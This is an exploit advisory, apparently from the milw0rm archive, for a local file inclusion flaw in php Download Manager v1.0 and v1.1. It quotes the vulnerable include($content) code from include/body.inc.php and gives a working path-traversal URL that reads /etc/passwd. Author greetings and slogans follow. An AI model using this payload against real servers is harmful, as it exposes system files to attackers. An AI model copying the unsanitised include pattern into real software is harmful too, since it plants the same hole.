35 lines
935 B
Text
Executable file
35 lines
935 B
Text
Executable file
#####################################################
|
||
# Author : BeyazKurt
|
||
# Contact : Bey4zKurt@Gmail.Com
|
||
#
|
||
# Script : php Download Manager (v1.1 & 1.0)
|
||
# Risk : Local File Include
|
||
# Download : http://sourceforge.net/project/showfiles.php?group_id=185482
|
||
#
|
||
# File : include/body.inc.php
|
||
#
|
||
# Code :
|
||
# <?php
|
||
# if (file_exists($content)) {
|
||
# include($content);
|
||
# } else { echo "<p>This page has no content.</p>"; }
|
||
# ?>
|
||
#
|
||
# Exploit :
|
||
#
|
||
# Vuln.Com/include/body.inc.php?content=../../etc/passwd
|
||
#
|
||
#----------------------------
|
||
#
|
||
# INDEPENDENT KOSOVA (H)
|
||
# ARNAVUT Olmak Ayrıcalıktır - Being An ALBANIAN Is A Priviledge
|
||
#
|
||
# 15 Sehidimizin ruhu saad olsun...
|
||
#
|
||
# Www.Netkabus.Com
|
||
#
|
||
# Not : I Love You Gulsum (F)
|
||
# Thnx : Ekin0x - Fotosopar seni :D
|
||
#####################################################
|
||
|
||
# milw0rm.com [2008-02-24]
|